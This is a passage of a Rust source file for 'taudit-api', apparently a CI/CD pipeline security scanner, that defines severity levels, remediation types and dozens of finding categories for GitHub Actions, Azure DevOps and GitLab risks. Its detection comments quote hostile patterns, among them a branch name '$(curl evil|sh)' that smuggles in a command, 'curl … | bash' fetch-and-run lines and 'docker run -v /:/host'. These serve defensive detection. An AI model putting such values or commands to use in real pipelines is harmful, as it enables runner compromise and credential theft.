taudit_api/
lib.rs

1//! # taudit-api — stable wire types for JSON / SARIF / CloudEvents
2//!
3//! This crate owns every Rust type that appears in taudit's emitted
4//! output (JSON `taudit-report.schema.json`, JSON `authority-graph.v1.json`,
5//! SARIF `result.message.text` and `result.ruleId`, CloudEvents
6//! `tauditruleid` / `tauditfindingfingerprint` extension attributes).
7//!
8//! ## Stability promise (0.x)
9//!
10//! While at `0.x`:
11//! - Additive changes (new variants, new fields) MAY ship in any minor
12//!   bump. Consumers should pin a minor (`taudit-api = "0.1"`) and
13//!   review on each upgrade.
14//! - Breaking changes (renamed fields, removed variants, changed serde
15//!   representations) trigger a `0.{N+1}` minor bump and a CHANGELOG
16//!   migration note.
17//!
18//! At `1.0`, the promise lifts: only `2.0` permits breaking changes; all
19//! `1.x` minor bumps are additive.
20//!
21//! ## Use in downstream tooling
22//!
23//! Downstream consumers (tsign, axiom, custom SIEM integrations,
24//! Backstage plugins) should depend on `taudit-api` directly rather than
25//! `taudit-core`. `taudit-core` is workspace-internal and may break
26//! between minors; `taudit-api` is the public contract.
27//!
28//! See ADR 0001 (graph as product) and ADR 0004 (prereleases publish to
29//! crates.io).
30
31#![deny(missing_docs)]
32
33use serde::{Deserialize, Serialize, Serializer};
34use std::collections::{BTreeMap, HashMap};
35use std::path::PathBuf;
36
37// ── Severity ─────────────────────────────────────────────────────
38
39/// Severity of a finding. Ordered by `rank()` (Critical = most severe).
40#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
41#[serde(rename_all = "snake_case")]
42pub enum Severity {
43    /// Highest — exploitable now, full authority leak.
44    Critical,
45    /// Significant exposure that needs prompt action.
46    High,
47    /// Notable but bounded risk.
48    Medium,
49    /// Low priority / hygiene.
50    Low,
51    /// Informational — no direct exposure, surfaces context for triage.
52    Info,
53}
54
55impl Severity {
56    fn rank(self) -> u8 {
57        match self {
58            Severity::Critical => 0,
59            Severity::High => 1,
60            Severity::Medium => 2,
61            Severity::Low => 3,
62            Severity::Info => 4,
63        }
64    }
65}
66
67impl Ord for Severity {
68    fn cmp(&self, other: &Self) -> std::cmp::Ordering {
69        self.rank().cmp(&other.rank())
70    }
71}
72
73impl PartialOrd for Severity {
74    fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
75        Some(self.cmp(other))
76    }
77}
78
79/// Move severity one rank toward `Info` (Critical -> High -> ... -> Info).
80/// `Info` stays `Info`. Used by both the suppression applicator and
81/// compensating-control detectors.
82///
83/// **API stability:** marked `#[doc(hidden)]` because this helper is a
84/// taudit-internal detail; downstream consumers should read `severity`
85/// directly from the JSON / SARIF / CloudEvents output.
86#[doc(hidden)]
87pub fn downgrade_severity(s: Severity) -> Severity {
88    match s {
89        Severity::Critical => Severity::High,
90        Severity::High => Severity::Medium,
91        Severity::Medium => Severity::Low,
92        Severity::Low => Severity::Info,
93        Severity::Info => Severity::Info,
94    }
95}
96
97// ── FindingCategory ──────────────────────────────────────────────
98
99/// MVP categories (1-5) are derivable from pipeline YAML alone.
100/// Stretch categories (6-9) need heuristics or metadata enrichment.
101#[allow(missing_docs)]
102#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
103#[serde(rename_all = "snake_case")]
104pub enum FindingCategory {
105    // MVP
106    AuthorityPropagation,
107    OverPrivilegedIdentity,
108    UnpinnedAction,
109    UntrustedWithAuthority,
110    ArtifactBoundaryCrossing,
111    // Stretch — implemented
112    FloatingImage,
113    LongLivedCredential,
114    /// Credential written to disk by a step (e.g. `persistCredentials: true` on a checkout).
115    /// Disk-persisted credentials are accessible to all subsequent steps and any process
116    /// with filesystem access, unlike runtime-only `HasAccessTo` authority.
117    PersistedCredential,
118    /// Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
119    TriggerContextMismatch,
120    /// Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
121    CrossWorkflowAuthorityChain,
122    /// Circular DelegatesTo chain — workflow calls itself transitively.
123    AuthorityCycle,
124    /// Privileged workflow (OIDC/broad identity) with no provenance attestation step.
125    UpliftWithoutAttestation,
126    /// Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.
127    SelfMutatingPipeline,
128    /// PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.
129    CheckoutSelfPrExposure,
130    /// ADO variable group consumed by a PR-triggered job, crossing trust boundary.
131    VariableGroupInPrJob,
132    /// Self-hosted agent pool used in a PR-triggered job that also checks out the repository.
133    SelfHostedPoolPrHijack,
134    /// ADO self-hosted pool without workspace isolation (`clean: true`/`all`).
135    /// Shared self-hosted agents retain their workspace across pipeline runs.
136    /// Without `workspace: { clean: all }`, a PR build can deposit malicious
137    /// files that persist for the next (possibly privileged) pipeline run,
138    /// enabling workspace poisoning attacks.
139    SharedSelfHostedPoolNoIsolation,
140    /// Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.
141    ServiceConnectionScopeMismatch,
142    /// ADO `resources.repositories[]` entry referenced by an `extends:`,
143    /// `template: x@alias`, or `checkout: alias` consumer resolves with no
144    /// `ref:` (default branch) or a mutable branch ref (`refs/heads/<name>`).
145    /// Whoever owns that branch can inject steps into the consuming pipeline.
146    TemplateExtendsUnpinnedBranch,
147    /// ADO `resources.repositories[]` entry pinned to a feature-class branch
148    /// (anything outside the `main` / `master` / `release/*` / `hotfix/*`
149    /// platform set). Feature branches typically have weaker push protection
150    /// than the trunk, so any developer with write access to that branch can
151    /// inject pipeline YAML that runs with the consumer's authority. Strictly
152    /// stronger signal than `template_extends_unpinned_branch` — co-fires.
153    TemplateRepoRefIsFeatureBranch,
154    /// Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension /
155    /// CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set)
156    /// where the executed command line interpolates a pipeline secret or a SAS token —
157    /// pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.
158    VmRemoteExecViaPipelineSecret,
159    /// A SAS token freshly minted in-pipeline is interpolated into a CLI argument
160    /// (commandToExecute / scriptArguments / --arguments / -ArgumentList) instead of
161    /// passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.
162    ShortLivedSasInCommandLine,
163    /// Pipeline secret value assigned to a shell variable inside an inline
164    /// script (`export VAR=$(SECRET)`, `$X = "$(SECRET)"`). Once the value
165    /// transits a shell variable, ADO's `$(SECRET)` log mask no longer
166    /// applies — transcripts (`Start-Transcript`, `bash -x`, terraform debug
167    /// logs) print the cleartext.
168    SecretToInlineScriptEnvExport,
169    /// Pipeline secret value written to a file under the agent workspace
170    /// (`$(System.DefaultWorkingDirectory)`, `$(Build.SourcesDirectory)`,
171    /// or relative paths) without `secureFile` task or chmod 600. The file
172    /// persists in the agent workspace and is uploaded by
173    /// `PublishPipelineArtifact` and crawlable by later steps.
174    SecretMaterialisedToWorkspaceFile,
175    /// PowerShell pulls a Key Vault secret with `-AsPlainText` (or
176    /// `ConvertFrom-SecureString -AsPlainText`, or older
177    /// `.SecretValueText` syntax) into a non-`SecureString` variable. The
178    /// value never traverses the ADO variable-group boundary, so verbose
179    /// Az/PS logging and error stack traces print the credential.
180    ///
181    /// Rule id is `keyvault_secret_to_plaintext` (single token "keyvault")
182    /// rather than the snake_case derivation `key_vault_…` — matches the
183    /// docs filename and the convention used in the corpus evidence.
184    #[serde(rename = "keyvault_secret_to_plaintext")]
185    KeyVaultSecretToPlaintext,
186    /// `terraform apply -auto-approve` against a production-named service connection
187    /// without an environment approval gate.
188    TerraformAutoApproveInProd,
189    /// `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline script —
190    /// the script can launder federated SPN/OIDC tokens into pipeline variables.
191    AddSpnWithInlineScript,
192    /// A `type: string` pipeline parameter (no `values:` allowlist) is interpolated
193    /// via `${{ parameters.X }}` into an inline shell/PowerShell script body —
194    /// shell injection vector for anyone with "queue build".
195    ParameterInterpolationIntoShell,
196    /// A `run:` block fetches a remote script from a mutable URL (`refs/heads/`,
197    /// `/main/`, `/master/`) and pipes it directly to a shell interpreter
198    /// (`curl … | bash`, `wget … | sh`, `bash <(curl …)`, `deno run https://…`).
199    /// Whoever controls that URL's content controls execution on the runner.
200    RuntimeScriptFetchedFromFloatingUrl,
201    /// Workflow trigger combines high-authority PR events
202    /// (`pull_request_target`, `issue_comment`, or `workflow_run`) with a step
203    /// whose `uses:` ref is a mutable branch/tag (not a 40-char SHA). Compromise
204    /// of the action's default branch yields full repo write on the target repo.
205    PrTriggerWithFloatingActionRef,
206    /// A `workflow_run`-triggered workflow captures a value from an external
207    /// API response (`gh pr view`, `gh api`, `curl api.github.com`) and writes
208    /// it into `$GITHUB_ENV`/`$GITHUB_OUTPUT`/`$GITHUB_PATH` without sanitisation.
209    /// A poisoned API field (branch name, title) injects environment variables
210    /// into every subsequent step in the same job.
211    UntrustedApiResponseToEnvSink,
212    /// A `pull_request`-triggered workflow logs into a container registry via a
213    /// floating (non-SHA-pinned) login action. The compromised action receives
214    /// OIDC tokens or registry credentials, and the workflow then pushes a
215    /// PR-controlled image to a shared registry.
216    PrBuildPushesImageWithFloatingCredentials,
217    /// First-party step writes a Secret/Identity-derived value into the
218    /// `$GITHUB_ENV` gate (or pipeline-variable equivalent) and a *later*
219    /// step in the same job that runs in `Untrusted` or `ThirdParty` trust
220    /// zone reads from the runner-managed env (`${{ env.X }}`). The two
221    /// component rules — `self_mutating_pipeline` (writer) and
222    /// `untrusted_with_authority` (consumer) — each see only half the
223    /// chain and emit no finding for the laundered consumer; this rule
224    /// closes the composition gap that R2 attack #3 exploited.
225    SecretViaEnvGateToUntrustedConsumer,
226    /// Positive-invariant rule (GHA): the workflow declares neither a
227    /// top-level nor a per-job `permissions:` block, leaving GITHUB_TOKEN at
228    /// its broad platform default. Fires once per workflow file.
229    NoWorkflowLevelPermissionsBlock,
230    /// Positive-invariant rule (ADO): a job referencing a production-named
231    /// service connection has no `environment:` binding, so it bypasses the
232    /// only ADO-side approval gate regardless of whether `-auto-approve` is
233    /// present. Strictly broader than `terraform_auto_approve_in_prod`.
234    ProdDeployJobNoEnvironmentGate,
235    /// Positive-invariant rule (cross-platform): a long-lived static
236    /// credential is in scope but the workflow does not currently use any
237    /// OIDC identity even though the target cloud supports federation.
238    /// Advisory uplift on top of `long_lived_credential` that wires the
239    /// existing `Recommendation::FederateIdentity` variant.
240    LongLivedSecretWithoutOidcRecommendation,
241    /// Positive-invariant rule (GHA): a PR-triggered workflow has multiple
242    /// privileged jobs where SOME have the standard fork-check `if:` and
243    /// OTHERS do not. Detects an intra-file inconsistency in defensive
244    /// posture — the org has the right instinct but applied it unevenly.
245    PullRequestWorkflowInconsistentForkCheck,
246    /// Positive-invariant rule (GitLab): a job with a production-named
247    /// `environment:` binding has no `rules:` / `only:` clause restricting
248    /// it to protected branches. Deploy job runs (or attempts to run) on
249    /// every pipeline trigger.
250    GitlabDeployJobMissingProtectedBranchOnly,
251    /// Two-step ADO chain: an inline script captures a `terraform output`
252    /// value (literal `terraform output` CLI invocation or a `$env:TF_OUT_*` /
253    /// `$TF_OUT_*` env var sourced from a Terraform CLI task) AND emits a
254    /// `##vso[task.setvariable variable=X;...]` directive setting that
255    /// captured value into pipeline variable `X`. A subsequent step in the
256    /// same job then expands `$(X)` in shell-expansion position
257    /// (`bash -c "..."`, `eval`, command substitution `$(...)`, PowerShell
258    /// `-split` / `Invoke-Command` / `Invoke-Expression`/`iex`, or as an
259    /// unquoted command word). The `task.setvariable` hop launders
260    /// attacker-controlled Terraform state — sourced from a remote backend
261    /// (S3 bucket, Azure Storage) that often has weaker access controls than
262    /// the pipeline itself — through pipeline-variable space and into a
263    /// shell interpreter.
264    TerraformOutputViaSetvariableShellExpansion,
265    /// GHA workflow declares a high-blast-radius trigger (`issue_comment`,
266    /// `pull_request_review`, `pull_request_review_comment`, `workflow_run`)
267    /// alongside write permissions or non-`GITHUB_TOKEN` secrets. Closes the
268    /// gap left by `trigger_context_mismatch` only firing on
269    /// `pull_request_target` / ADO `pr`.
270    RiskyTriggerWithAuthority,
271    /// A `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
272    /// OIDC-bearing step output, or has a credential-shaped name. Job outputs
273    /// flow unmasked through `needs.<job>.outputs.*` and are written to the
274    /// run log — masking is heuristic, never authoritative.
275    SensitiveValueInJobOutput,
276    /// A `workflow_dispatch.inputs.*` value flows into `curl` / `wget` /
277    /// `gh api` / a `run:` URL / `actions/checkout` `ref:`. Anyone with
278    /// dispatch permission can pivot the run to attacker-controlled refs or
279    /// hosts.
280    ManualDispatchInputToUrlOrCommand,
281    /// A reusable workflow call uses `secrets: inherit` while the caller is
282    /// triggered by an attacker-influenced event (`pull_request`,
283    /// `pull_request_target`, `issue_comment`, `workflow_run`). The whole
284    /// caller secret bag forwards to the callee regardless of what the callee
285    /// actually consumes — every transitive `uses:` in the called workflow
286    /// inherits the same scope.
287    SecretsInheritOverscopedPassthrough,
288    /// A `workflow_run`- or `pull_request_target`-triggered consumer
289    /// downloads an artifact from the originating run AND interprets that
290    /// artifact's content into a privileged sink (post-to-comment, write to
291    /// `$GITHUB_ENV`, `eval`, …). The producer ran in PR context, so a
292    /// malicious PR can write arbitrary content into the artifact while the
293    /// consumer holds upstream-repo authority.
294    UnsafePrArtifactInWorkflowRunConsumer,
295    /// A GitHub Actions `run:` block (or `actions/github-script` `script:` body)
296    /// interpolates an attacker-controllable expression — `${{ github.event.* }}`,
297    /// `${{ github.head_ref }}`, or `${{ inputs.* }}` from a privileged trigger
298    /// (`workflow_dispatch` / `workflow_run` / `issue_comment`) — directly into
299    /// the script text without first binding through an `env:` indirection.
300    /// Classic GitHub Actions remote-code-execution pattern.
301    ScriptInjectionViaUntrustedContext,
302    /// A workflow that holds non-`GITHUB_TOKEN` secrets or non-default
303    /// write permissions includes a step that uses an interactive debug action
304    /// (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …).
305    /// A maintainer flipping `debug_enabled=true` publishes the runner's full
306    /// environment over an external SSH endpoint.
307    InteractiveDebugActionInAuthorityWorkflow,
308    /// An `actions/cache` step keys the cache on a PR-derived expression
309    /// (`github.head_ref`, `github.event.pull_request.head.ref`, `github.actor`)
310    /// in a workflow that ALSO runs on `push: branches: [main]` — a PR can
311    /// poison the cache that the default-branch build later restores.
312    PrSpecificCacheKeyInDefaultBranchConsumer,
313    /// A `run:` step uses `gh ` / `gh api` with the default `GITHUB_TOKEN` to
314    /// perform a write-class action (`pr merge`, `release create/upload`,
315    /// `api -X POST/PATCH/PUT/DELETE` to `/repos/.../{contents,releases,actions/secrets,environments}`)
316    /// inside a workflow triggered by `pull_request`, `issue_comment`, or
317    /// `workflow_run` — runtime privilege escalation that static permission
318    /// checks miss.
319    GhCliWithDefaultTokenEscalating,
320    /// GitLab CI `$CI_JOB_TOKEN` (or `gitlab-ci-token:$CI_JOB_TOKEN`) used as a
321    /// bearer credential against an external HTTP API or fed to `docker login`
322    /// for `registry.gitlab.com`. CI_JOB_TOKEN's default scope (registry write,
323    /// package upload, project read) means a poisoned MR job that emits the
324    /// token to a webhook can pivot to package/registry pushes elsewhere.
325    CiJobTokenToExternalApi,
326    /// GitLab CI `id_tokens:` declares an `aud:` audience that is reused across
327    /// MR-context and protected-context jobs (no audience separation), or is a
328    /// wildcard / multi-cloud broker URL. The audience is what trades for
329    /// downstream cloud creds — a single shared `aud` means any job that
330    /// compromises the token assumes the most-privileged role any other job
331    /// uses.
332    IdTokenAudienceOverscoped,
333    /// Direct shell interpolation of attacker-controlled GitLab predefined
334    /// vars (`$CI_COMMIT_BRANCH`, `$CI_COMMIT_REF_NAME`, `$CI_COMMIT_TAG`,
335    /// `$CI_COMMIT_MESSAGE`, `$CI_COMMIT_TITLE`, `$CI_MERGE_REQUEST_TITLE`,
336    /// `$CI_MERGE_REQUEST_DESCRIPTION`,
337    /// `$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `$CI_COMMIT_AUTHOR`) into
338    /// `script:` / `before_script:` / `after_script:` / `environment:url:`
339    /// without single-quote isolation. A branch named `` $(curl evil|sh) ``
340    /// executes inside the runner. GitLab generalisation of the GHA
341    /// `script_injection_via_untrusted_context` class.
342    UntrustedCiVarInShellInterpolation,
343    /// A GitLab `include:` references (a) a `remote:` URL pointing at a
344    /// branch (`/-/raw/<branch>/...`), (b) a `project:` with `ref:` resolving
345    /// to a mutable branch name (main/master/develop), or (c) an include with
346    /// no `ref:` at all (defaults to HEAD). Whoever owns that branch can
347    /// backdoor every consumer's pipeline silently — included YAML executes
348    /// with the consumer's secrets and CI_JOB_TOKEN.
349    UnpinnedIncludeRemoteOrBranchRef,
350    /// A GitLab job declares a `services: [docker:*-dind]` sidecar AND holds
351    /// at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys,
352    /// signing keys, vault id_tokens). docker-in-docker exposes the full
353    /// Docker socket inside the job container — a malicious build step can
354    /// `docker run -v /:/host` from inside dind and read the runner host
355    /// filesystem (other jobs' artifacts, cached creds).
356    DindServiceGrantsHostAuthority,
357    /// A GitLab job whose name or `extends:` matches scanner patterns
358    /// (`sast`, `dast`, `secret_detection`, `dependency_scanning`,
359    /// `container_scanning`, `gitleaks`, `trivy`, `grype`, `semgrep`, etc.)
360    /// runs with `allow_failure: true` AND has no `rules:` clause that
361    /// surfaces the failure. The pipeline goes green even when the scan
362    /// errors out — silent-pass is worse than no scan because reviewers trust
363    /// the badge.
364    SecurityJobSilentlySkipped,
365    /// A GitLab `trigger:` job (downstream / child pipeline) runs in
366    /// `merge_request_event` context OR uses `include: artifact:` from a
367    /// previous job (dynamic child pipeline). Dynamic child pipelines are a
368    /// code-injection sink — anything the build step writes to the artifact
369    /// runs as a real pipeline with the parent project's secrets.
370    ChildPipelineTriggerInheritsAuthority,
371    /// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
372    /// only, or `$CI_COMMIT_REF_SLUG` without a `policy: pull` restriction.
373    /// Caches are stored per-runner keyed by `key:`; a poisoned MR can push a
374    /// malicious `node_modules/` cache that the next default-branch job
375    /// downloads and executes during `npm install`.
376    CacheKeyCrossesTrustBoundary,
377    /// A CI script constructs an HTTPS git URL with embedded credentials
378    /// (`https://user:$TOKEN@host/...`) before invoking `git clone`,
379    /// `git push`, or `git remote set-url`. The credential is exposed
380    /// in the process argv (visible to `ps`, `/proc/*/cmdline`), persists
381    /// in `.git/config` for the rest of the job, and may be uploaded as
382    /// part of any artifact that bundles the workspace.
383    PatEmbeddedInGitRemoteUrl,
384    /// A CI job triggers a different project's pipeline via the GitLab
385    /// REST API using `CI_JOB_TOKEN` and forwards user-influenced variables
386    /// through the `variables[KEY]=value` query/form parameter. The
387    /// downstream project's security depends on the trust contract between
388    /// the two projects — variable values flowing across that boundary
389    /// constitute a cross-project authority bridge.
390    CiTokenTriggersDownstreamWithVariablePassthrough,
391    /// A GitLab job emits an `artifacts.reports.dotenv: <file>` artifact
392    /// whose contents become pipeline variables for any consumer linked
393    /// via `needs:` or `dependencies:`. A consumer in a later stage that
394    /// targets a production-named environment inherits those variables
395    /// transparently — no explicit download is visible at the job level.
396    /// When the producer reads attacker-influenced inputs (branch names,
397    /// commit messages), the dotenv flow is a covert privilege escalation
398    /// channel into the deployment job.
399    DotenvArtifactFlowsToPrivilegedDeployment,
400    /// ADO inline script sets a sensitive-named pipeline variable via
401    /// `##vso[task.setvariable variable=<NAME>]` with `issecret=false` or
402    /// without the `issecret` flag at all. Without `issecret=true` the
403    /// variable value is printed in plaintext to the pipeline log and is
404    /// not masked in downstream step output.
405    SetvariableIssecretFalse,
406    /// A GHA `uses:` action reference contains a non-ASCII character —
407    /// possible Unicode confusable / homoglyph impersonating a trusted
408    /// action (e.g. Cyrillic `a` instead of Latin `a`, or U+2215
409    /// DIVISION SLASH instead of U+002F SOLIDUS).
410    HomoglyphInActionRef,
411    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
412    /// helper-delegating action passes sensitive material to a bare helper via
413    /// command-line arguments. The prior step can select the helper that
414    /// receives later action-only authority.
415    GhaHelperPathSensitiveArgv,
416    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
417    /// helper-delegating action passes sensitive material to a bare helper over
418    /// stdin, such as Docker login passwords or Wrangler secret payloads.
419    GhaHelperPathSensitiveStdin,
420    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
421    /// helper-delegating action runs a bare helper with sensitive environment
422    /// values in scope.
423    GhaHelperPathSensitiveEnv,
424    /// A GitHub Actions post action recomputes cleanup targets from ambient
425    /// environment rather than an action-owned state channel, allowing later
426    /// `GITHUB_ENV` writes to retarget cleanup.
427    GhaPostAmbientEnvCleanupPath,
428    /// A GitHub Actions action mints or exchanges later credentials and then
429    /// delegates them to a PATH-resolved helper.
430    GhaActionMintedSecretToHelper,
431    /// A GitHub Actions action invokes a security-sensitive helper by bare
432    /// name after an earlier same-job `GITHUB_PATH` mutation.
433    GhaHelperUntrustedPathResolution,
434    /// A GitHub Actions login action exposes credential material as step
435    /// outputs after helper login, making cross-job propagation easy to miss.
436    GhaSecretOutputAfterHelperLogin,
437    /// Umbrella GHA authority-confusion classifier: an earlier same-job
438    /// `GITHUB_PATH` mutation precedes a later helper action that receives or
439    /// mints sensitive authority.
440    LaterSecretMaterializedAfterPathMutation,
441    /// `actions/setup-node` cache mode resolves npm/pnpm/yarn helpers after an
442    /// earlier same-job `GITHUB_PATH` mutation.
443    GhaSetupNodeCacheHelperPathHandoff,
444    /// `actions/setup-python` cache mode resolves pip/pipenv/poetry helpers
445    /// after an earlier same-job `GITHUB_PATH` mutation.
446    GhaSetupPythonCacheHelperPathHandoff,
447    /// `actions/setup-python` pip-install mode runs pip while inheriting
448    /// ambient credentials or cloud authority.
449    GhaSetupPythonPipInstallAuthorityEnv,
450    /// `actions/setup-go` cache mode resolves Go helpers after an earlier
451    /// same-job `GITHUB_PATH` mutation.
452    GhaSetupGoCacheHelperPathHandoff,
453    /// `docker/setup-qemu-action` invokes Docker/QEMU helper flow in a job that
454    /// already has registry authority or private-image context.
455    GhaDockerSetupQemuPrivilegedDockerHelper,
456    /// Tool-installer action is followed by shell use of the installed helper
457    /// while deploy/signing authority is in scope.
458    GhaToolInstallerThenShellHelperAuthority,
459    /// Shell command sequence concentrates publish, deploy, signing, registry,
460    /// or release authority in a workflow step.
461    GhaWorkflowShellAuthorityConcentration,
462    /// `peter-evans/create-pull-request` receives PR token authority after an
463    /// earlier same-job `GITHUB_PATH` mutation and delegates to `git`.
464    GhaCreatePrGitTokenPathHandoff,
465    /// `crazy-max/ghaction-import-gpg` receives GPG private key/passphrase
466    /// material after an earlier same-job `GITHUB_PATH` mutation.
467    GhaImportGpgPrivateKeyHelperPath,
468    /// `webfactory/ssh-agent` receives SSH private key material after an
469    /// earlier same-job `GITHUB_PATH` mutation.
470    GhaSshAgentPrivateKeyToPathHelper,
471    /// `apple-actions/import-codesign-certs` receives macOS P12/keychain
472    /// material after an earlier same-job `GITHUB_PATH` mutation.
473    GhaMacosCodesignCertSecurityPath,
474    /// Pages deploy actions compose token/deploy-key Git authority after an
475    /// earlier same-job `GITHUB_PATH` mutation.
476    GhaPagesDeployTokenUrlToGitHelper,
477    /// Precision guard for actions that install a helper into the toolcache
478    /// and invoke that absolute path instead of resolving a bare helper from
479    /// runner `PATH`.
480    GhaToolcacheAbsolutePathDowngrade,
481    // Reserved — requires ADO/GH API enrichment beyond pipeline YAML.
482    // Sealed against deserialisation: a custom-rule YAML using these
483    // categories errors out with `unknown variant` at load time, because
484    // they cannot be detected from pipeline YAML alone. They still
485    // serialise normally so future runtime-enrichment paths inside the
486    // taudit binary can emit them, and the output schemas advertise them.
487    /// Requires runtime network telemetry or policy enrichment — not detectable from YAML alone.
488    #[serde(skip_deserializing)]
489    #[doc(hidden)]
490    EgressBlindspot,
491    /// Requires external audit-sink configuration data — not detectable from YAML alone.
492    #[serde(skip_deserializing)]
493    #[doc(hidden)]
494    MissingAuditTrail,
495}
496
497// ── Recommendation ───────────────────────────────────────────────
498
499/// Routing: scope findings -> TsafeRemediation; isolation findings -> CellosRemediation.
500#[allow(missing_docs)]
501#[derive(Debug, Clone, Serialize, Deserialize)]
502#[serde(tag = "type", rename_all = "snake_case")]
503pub enum Recommendation {
504    /// Remediate via `tsafe` — narrow / rotate / revoke a credential or scope.
505    TsafeRemediation {
506        command: String,
507        explanation: String,
508    },
509    /// Remediate via CellOS isolation primitives.
510    CellosRemediation { reason: String, spec_hint: String },
511    /// Pin a floating action reference to an immutable SHA.
512    PinAction { current: String, pinned: String },
513    /// Reduce the permissions block on the scope-bearing step.
514    ReducePermissions { current: String, minimum: String },
515    /// Replace a long-lived static credential with a federated OIDC identity.
516    FederateIdentity {
517        static_secret: String,
518        oidc_provider: String,
519    },
520    /// Free-form manual remediation — used when no canned action applies.
521    Manual { action: String },
522}
523
524// ── FindingSource ────────────────────────────────────────────────
525
526/// Provenance of a finding — distinguishes findings emitted by built-in
527/// taudit rules from findings emitted by user-loaded custom invariant YAML
528/// (`--invariants-dir`). Custom rules can emit arbitrarily-worded findings
529/// at any severity, so an operator piping output into a JIRA workflow or
530/// SARIF upload needs a non-spoofable signal of which file the rule came
531/// from. Serializes as `"built-in"` (string) for built-in findings and
532/// `{"custom": "<path>"}` for custom-rule findings — see
533/// `docs/finding-fingerprint.md` for the contract.
534#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
535#[serde(rename_all = "snake_case")]
536pub enum FindingSource {
537    /// Emitted by a built-in rule defined in `taudit-core::rules`. The
538    /// authoritative trust anchor — the binary's release commit defines the
539    /// rule logic. Serialises as the kebab-case string `"built-in"` to match
540    /// `schemas/finding.v1.json`.
541    #[default]
542    #[serde(rename = "built-in")]
543    BuiltIn,
544    /// Emitted by a custom invariant rule loaded from the given YAML file.
545    /// The path is the file the rule was loaded from, retained so operators
546    /// can audit which file produced any given finding.
547    Custom {
548        /// On-disk path of the custom-rule YAML file that produced this finding.
549        source_file: PathBuf,
550    },
551}
552
553impl FindingSource {
554    /// True for findings emitted by built-in rules.
555    pub fn is_built_in(&self) -> bool {
556        matches!(self, FindingSource::BuiltIn)
557    }
558}
559
560// ── FixEffort ────────────────────────────────────────────────────
561
562/// Coarse-grained remediation effort. Surfaces in JSON `time_to_fix` and SARIF
563/// `properties.timeToFix` so triage dashboards can sort by `severity * effort`.
564///
565/// The four buckets are deliberately wide. Precise time estimates would invite
566/// argument; the buckets exist to separate "flip a flag" from "rewrite a job"
567/// from "renegotiate ops policy".
568///
569/// Per `MEMORY/.../blueteam-corpus-defense.md` Section 3 / Enhancement E-3.
570#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
571#[serde(rename_all = "snake_case")]
572pub enum FixEffort {
573    /// ~5 minutes. Mechanical change to a single file (flip a flag, pin a SHA,
574    /// add a `permissions: {}` block). No structural risk.
575    Trivial,
576    /// ~1 hour. Refactor a step or job: split a script, add a fork-check,
577    /// move a secret to an environment binding.
578    Small,
579    /// ~1 day. Restructure a job or pipeline: introduce an environment gate,
580    /// move from inline scripts to a sandboxed action, add an OIDC role.
581    Medium,
582    /// ~1 week or more. Operational policy change: migrate from PATs to OIDC
583    /// across an org, change branch protection model, retire a service principal.
584    Large,
585}
586
587// ── FindingExtras + Finding ──────────────────────────────────────
588
589/// Optional finding metadata. Lives on every `Finding` via
590/// `#[serde(flatten)]` so consumers see the fields at the top of the
591/// finding object — same place they'd appear if declared inline on
592/// `Finding`. Default-constructed extras serialize to nothing (all
593/// `Option::None` and empty `Vec`s skip-serialize), so existing
594/// snapshots remain byte-stable until a rule populates a field.
595///
596/// **Why a wrapper struct?** The 30+ rule call sites use struct
597/// literal syntax. Adding fields directly to `Finding` would force
598/// every site to edit. With `extras: FindingExtras::default()`, new
599/// extras can be added in a single place.
600#[derive(Debug, Clone, Default, Serialize, Deserialize)]
601pub struct FindingExtras {
602    /// Stable UUID v5 over `(NAMESPACE, fingerprint)` — collapses
603    /// per-hop findings against the same authority root into one group
604    /// for SIEM display. See `compute_finding_group_id`.
605    #[serde(default, skip_serializing_if = "Option::is_none")]
606    pub finding_group_id: Option<String>,
607
608    /// Coarse remediation effort. See `FixEffort`.
609    #[serde(default, skip_serializing_if = "Option::is_none")]
610    pub time_to_fix: Option<FixEffort>,
611
612    /// Human-readable list of controls that already neutralise (or partially
613    /// neutralise) this finding — populated when a compensating-control
614    /// detector downgrades severity. Empty when no downgrade applied.
615    #[serde(default, skip_serializing_if = "Vec::is_empty")]
616    pub compensating_controls: Vec<String>,
617
618    /// Set to `true` by the suppression applicator when a matching
619    /// `.taudit-suppressions.yml` entry exists AND the configured mode
620    /// is `Suppress`. The finding still appears in output (audit trail
621    /// preserved) but consumers can filter on this field.
622    #[serde(default, skip_serializing_if = "is_false")]
623    pub suppressed: bool,
624
625    /// Original pre-downgrade severity. Populated by the suppression
626    /// applicator OR a compensating-control detector when `severity`
627    /// is mutated. `None` means the current severity is the rule-emitted
628    /// value.
629    #[serde(default, skip_serializing_if = "Option::is_none")]
630    pub original_severity: Option<Severity>,
631
632    /// Operator-supplied justification from the matching suppression
633    /// entry. `None` when no suppression applies.
634    #[serde(default, skip_serializing_if = "Option::is_none")]
635    pub suppression_reason: Option<String>,
636
637    /// Per-finding stable anchor mixed into the fingerprint canonical
638    /// string. Populated by rules that have no natural graph node to
639    /// place in `nodes_involved` (e.g. ADO `resources.repositories[]`
640    /// aliases, GitLab `include:` entries, workflow-level invariants).
641    /// When two findings of the same rule fire in the same file, their
642    /// anchors must differ for the fingerprints to differ.
643    ///
644    /// Round-trips through JSON so external tools that recompute
645    /// fingerprints from loaded findings get the same value as the
